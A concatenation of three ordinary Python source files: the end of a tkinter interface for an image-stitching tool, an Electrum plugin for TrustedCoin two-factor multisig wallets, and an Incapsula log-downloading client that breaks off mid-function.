stitcher.manage_batches(self.stitch_threshold.get(), self.eight_bit.get(), show_arrow=self.arrow_overlay.get(),
max_processes=self.max_processes.get(), enhance_contrast=self.contrast_enhance.get())
stitcher.combine_csvs(delete_batches=True)
logging.info('Finished processing the experiment')
self.run_button_ready()
def create_logging_window(self):
# TODO: Check if the window already exists. Only make a new window if it doesn't exist yet
log_window = tk.Toplevel(self.master)
log_window.title('Log')
LoggingWindow(log_window)
def dummy(self, iterations):
"""Dummy run function to test the interface, e.g. locally on my Mac
Function just does some logging so that the interface can be tested.
Args:
iterations (int): Number of log messages to be produced
"""
logger = logging.getLogger(__name__)
for i in range(iterations):
logger.info('Running Dummy')
time.sleep(1)
for i in range(iterations):
logger.info('Running Dummy 2! =D')
time.sleep(1)
self.run_button_ready()
@staticmethod
def nothing():
"""If the run button has already been pressed, just do nothing on future presses until the function finishes
"""
pass
def ask_for_path(self):
path = tkinter.filedialog.askdirectory(title='Select folder containing the MapsProject.xml file')
self.project_path.set(path)
def ask_for_file(self):
path = tkinter.filedialog.askopenfilename(title='Select the classifier output',
filetypes=(("csv files", "*.csv"), ("all files", "*.*")))
self.csv_path.set(path)
def display_csv_picker(self):
if self.classifier_input.get():
self.csv_picker_label.grid(row=2, column=0, sticky=tk.E)
self.csv_picker_entry.grid(row=2, column=1, sticky=tk.W)
self.csv_picker_button.grid(row=2, column=2, sticky=tk.W)
else:
self.csv_picker_label.grid_remove()
self.csv_picker_entry.grid_remove()
self.csv_picker_button.grid_remove()
def check_all_parameters_set(self):
try:
params_set = len(self.project_path.get()) > 0
params_set = params_set and type(self.max_processes.get()) == int
params_set = params_set and type(self.eight_bit.get()) == bool
params_set = params_set and type(self.batch_size.get()) == int
params_set = params_set and len(self.output_folder.get()) > 0
params_set = params_set and len(self.csv_folder_name.get()) > 0
params_set = params_set and len(self.highmag_layer.get()) > 0
params_set = params_set and type(self.stitch_threshold.get()) == int
if self.classifier_input.get():
params_set = params_set and len(self.csv_path.get()) > 0
params_set = params_set and self.csv_path.get().endswith('.csv')
except _tkinter.TclError:
params_set = False
return params_set
def shutdown(self):
# Helper function to shut down all stitching processes when the interface is quit
if tk.messagebox.askokcancel("Quit", "Do you want to stop processing the experiment?"):
self.master.destroy()
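# A minimal launch sketch, added for illustration; the original entry point may live in
# another module. It wires the window-close button to Gui.shutdown so stitching threads
# are stopped when the interface is quit.
if __name__ == '__main__':
    root = tk.Tk()
    gui = Gui(root)
    root.protocol('WM_DELETE_WINDOW', gui.shutdown)
    root.mainloop()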
|
trustedcoin.py
|
#!/usr/bin/env python3
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import time
import base64
import hashlib
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrumpq
from electrumpq import bitcoin
from electrumpq import constants
from electrumpq import keystore
from electrumpq.bitcoin import *
from electrumpq.mnemonic import Mnemonic
from electrumpq import version
from electrumpq.wallet import Multisig_Wallet, Deterministic_Wallet
from electrumpq.i18n import _
from electrumpq.plugins import BasePlugin, hook
from electrumpq.util import NotEnoughFunds
from electrumpq.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
    def send_request(self, method, relative_url, data=None, headers=None):
        # extra headers (e.g. the x-signature used by transfer_credit) are merged into the request
        kwargs = {'headers': dict(headers) if headers else {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
response = requests.request(method, url, **kwargs)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
        Attempt to have a transaction cosigned on behalf of a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
billing_info = server.get(wallet.get_user_id()[1])
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
self.requesting = False
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrumpq.mnemonic import Mnemonic
from electrumpq.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, 'standard')
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 24:
assert passphrase == ''
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), '', "m/")
elif n==12:
xprv1, xpub1 = self.get_xkeys(seed, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.storage.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.stack = []
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('create_remote_key'))
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, wizard):
email = self.accept_terms_of_use(wizard)
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xpub3 = make_xpub(get_signing_xpub(), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except socket.error:
wizard.show_message('Server not reachable, aborting')
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
try:
assert _id == short_id, ("user id error", _id, short_id)
assert xpub3 == _xpub3, ("xpub3 error", xpub3, _xpub3)
except Exception as e:
wizard.show_message(str(e))
return
self.check_otp(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3):
otp, reset = self.request_otp_dialog(wizard, short_id, otp_secret)
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except:
wizard.show_message(_('Incorrect password'))
return
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
try:
assert xpub1 == wizard.storage.get('x1/')['xpub']
assert xpub2 == wizard.storage.get('x2/')['xpub']
except:
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = regenerate_key(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.check_otp(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'create_remote_key'
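# --- Usage sketch (illustrative only, not part of the plugin) ---
# Direct calls against the module-level `server` client defined above; `short_id`,
# `otp` and `raw_tx_hex` are hypothetical values that would normally come from the
# wizard / wallet flow.
#
#     print(server.get_terms_of_service())              # plain-text terms of service
#     billing_info = server.get(short_id)                # billing info for a cosigner
#     server.auth(short_id, otp)                         # one-time-password check
#     result = server.sign(short_id, raw_tx_hex, otp)    # ask TrustedCoin to cosign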
|
LogsDownloader.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Doron Lehmann, Incapsula, Inc.
# Date: 2015
# Description: Logs Downloader Client
#
# ************************************************************************************
# Copyright (c) 2015, Incapsula, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ************************************************************************************
#
import configparser
import base64
import getopt
import hashlib
import logging
import os
import platform
import re
import signal
import sys
import threading
import time
import traceback
import ssl
import urllib3
import zlib
from logging import handlers
import socket
import M2Crypto
from Crypto.Cipher import AES
"""
Main class for downloading log files
"""
class LogsDownloader:
# the LogsDownloader will run until external termination
running = True
def __init__(self, config_path, system_log_path, log_level):
# Add by Maytee Sittipornchaisakul
# set default output syslog
self.setOutputSyslogHandler = False
# set a log file for the downloader
self.logger = logging.getLogger("logsDownloader")
# default log directory for the downloader
log_dir = system_log_path
# create the log directory if needed
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# keep logs history for 7 days
file_handler = logging.handlers.TimedRotatingFileHandler(os.path.join(log_dir, "logs_downloader.log"), when='midnight', backupCount=7)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
self.logger.addHandler(console_handler)
if log_level == "DEBUG":
self.logger.setLevel(logging.DEBUG)
elif log_level == "INFO":
self.logger.setLevel(logging.INFO)
elif log_level == "ERROR":
self.logger.setLevel(logging.ERROR)
self.logger.debug("Initializing LogsDownloader")
self.config_path = config_path
self.config_reader = Config(self.config_path, self.logger)
try:
# read the configuration file and load it
self.config = self.config_reader.read()
except Exception:
self.logger.error("Exception while getting LogsDownloader config file - Could Not find Configuration file - %s", traceback.format_exc())
sys.exit("Could Not find Configuration file")
# create a file downloader handler
self.file_downloader = FileDownloader(self.config, self.logger)
# create a last file id handler
self.last_known_downloaded_file_id = LastFileId(self.config_path)
# create a logs file index handler
self.logs_file_index = LogsFileIndex(self.config, self.logger, self.file_downloader)
# create log folder if needed for storing downloaded logs
if self.config.SAVE_LOCALLY == "YES":
if not os.path.exists(self.config.PROCESS_DIR):
os.makedirs(self.config.PROCESS_DIR)
self.logger.info("LogsDownloader initializing is done")
"""
Download the log files.
If this is the first time, we get the logs.index file, scan it, and download all of the files in it.
    If this is not the first time, we try to fetch the next log file.
"""
def get_log_files(self):
retries = 0
while self.running:
# check what is the last log file that we downloaded
last_log_id = self.last_known_downloaded_file_id.get_last_log_id()
# if there is no last downloaded file
if last_log_id == "":
self.logger.info("No last downloaded file is found - downloading index file and starting to download all the log files in it")
try:
# download the logs.index file
self.logs_file_index.download()
# scan it and download all of the files in it
self.first_time_scan()
except Exception as e:
self.logger.error("Failed to downloading index file and starting to download all the log files in it - %s, %s", e, traceback.format_exc())
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
time.sleep(30)
continue
            # there is a last downloaded log file id
else:
self.logger.debug("The last known downloaded file is %s", last_log_id)
# get the next log file name that we should download
next_file = self.last_known_downloaded_file_id.get_next_file_name()
self.logger.debug("Will now try to download %s", next_file)
try:
# download and handle the next log file
success = self.handle_file(next_file)
# if we successfully handled the next log file
if success:
self.logger.debug("Successfully handled file %s, updating the last known downloaded file id", next_file)
if self.running:
self.logger.info("Sleeping for 2 seconds before fetching the next logs file")
retries = 0
time.sleep(2)
# set the last handled log file information
self.last_known_downloaded_file_id.move_to_next_file()
# we failed to handle the next log file
else:
self.logger.info("Could not get log file %s. It could be that the log file does not exist yet.", next_file)
if self.running:
if retries >= 10:
self.logger.info("Failed to download file 10 times, trying to recover.")
# download the logs.index file
self.logs_file_index.download()
logs_in_index = self.logs_file_index.indexed_logs()
log_id = self.get_counter_from_file_name(next_file)
first_log_id_in_index = self.get_counter_from_file_name(logs_in_index[0])
if log_id < first_log_id_in_index:
self.logger.error("Current downloaded file is not in the index file any more. This is probably due to a long delay in downloading. Attempting to recover")
self.last_known_downloaded_file_id.remove_last_log_id()
elif self.last_known_downloaded_file_id.get_next_file_name(skip_files=1) in logs_in_index:
self.logger.warning("Skipping " + next_file)
self.last_known_downloaded_file_id.move_to_next_file()
else:
self.logger.info("Next file still does not exist. Sleeping for 30 seconds and continuing normally")
retries = 0
time.sleep(30)
else:
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
retries += 1
time.sleep(30)
except Exception as e:
self.logger.error("Failed to download file %s. Error is - %s , %s", next_file, e, traceback.format_exc())
"""
Scan the logs.index file, and download all the log files in it
"""
def first_time_scan(self):
self.logger.info("No last index found, will now scan the entire index...")
# get the list of file names from the index file
logs_in_index = self.logs_file_index.indexed_logs()
# for each file
for log_file_name in logs_in_index:
if self.running:
if LogsFileIndex.validate_log_file_format(str(log_file_name.rstrip('\r\n'))):
# download and handle the log file
success = self.handle_file(log_file_name)
# if we successfully handled the log file
if success:
# set the last handled log file information
self.last_known_downloaded_file_id.update_last_log_id(log_file_name)
else:
# skip the file and try to get the next one
self.logger.warning("Skipping File %s", log_file_name)
self.logger.info("Completed fetching all the files from the logs files index file")
"""
Download a log file, decrypt, unzip, and store it
"""
def handle_file(self, logfile, wait_time=5):
# we will try to get the file a max of 3 tries
counter = 0
while counter <= 3:
if self.running:
# download the file
result = self.download_log_file(logfile)
# if we got it
if result[0] == "OK":
try:
# we decrypt the file
decrypted_file = self.decrypt_file(result[1], logfile)
# handle the decrypted content
self.handle_log_decrypted_content(logfile, decrypted_file)
self.logger.info("File %s download and processing completed successfully", logfile)
return True
# if an exception occurs during the decryption or handling the decrypted content,
# we save the raw file to a "fail" folder
except Exception as e:
self.logger.info("Saving file %s locally to the 'fail' folder %s %s", logfile, e, traceback.format_exc())
fail_dir = os.path.join(self.config.PROCESS_DIR, 'fail')
if not os.path.exists(fail_dir):
os.mkdir(fail_dir)
with open(os.path.join(fail_dir, logfile), "w") as file:
file.write(result[1])
self.logger.info("Saved file %s locally to the 'fail' folder", logfile)
break
# if the file is not found (could be that it is not generated yet)
elif result[0] == "NOT_FOUND" or result[0] == "ERROR":
# we increase the retry counter
counter += 1
# if we want to sleep between retries
if wait_time > 0 and counter <= 3:
if self.running:
self.logger.info("Sleeping for %s seconds until next file download retry number %s out of 3", wait_time, counter)
time.sleep(wait_time)
# if the downloader was stopped
else:
return False
        # if we didn't succeed in downloading the file
return False
"""
Saves the decrypted file content to a log file in the filesystem
"""
def handle_log_decrypted_content(self, filename, decrypted_file):
decrypted_file = decrypted_file.decode('utf-8')
if self.config.SYSLOG_ENABLE == 'YES':
syslogger = logging.getLogger("syslog")
syslogger.setLevel(logging.INFO)
if self.config.SYSLOG_PROTO == 'TCP':
self.logger.info('Syslog enabled, using TCP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)), socktype=socket.SOCK_STREAM)
else:
self.logger.info('Syslog enabled, using UDP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)))
### Add by Maytee Sittipornchaisakul
if not self.setOutputSyslogHandler:
syslogger.addHandler(syslog)
self.setOutputSyslogHandler = True
for msg in decrypted_file.splitlines():
if msg != '':
try:
syslogger.info(msg)
except:
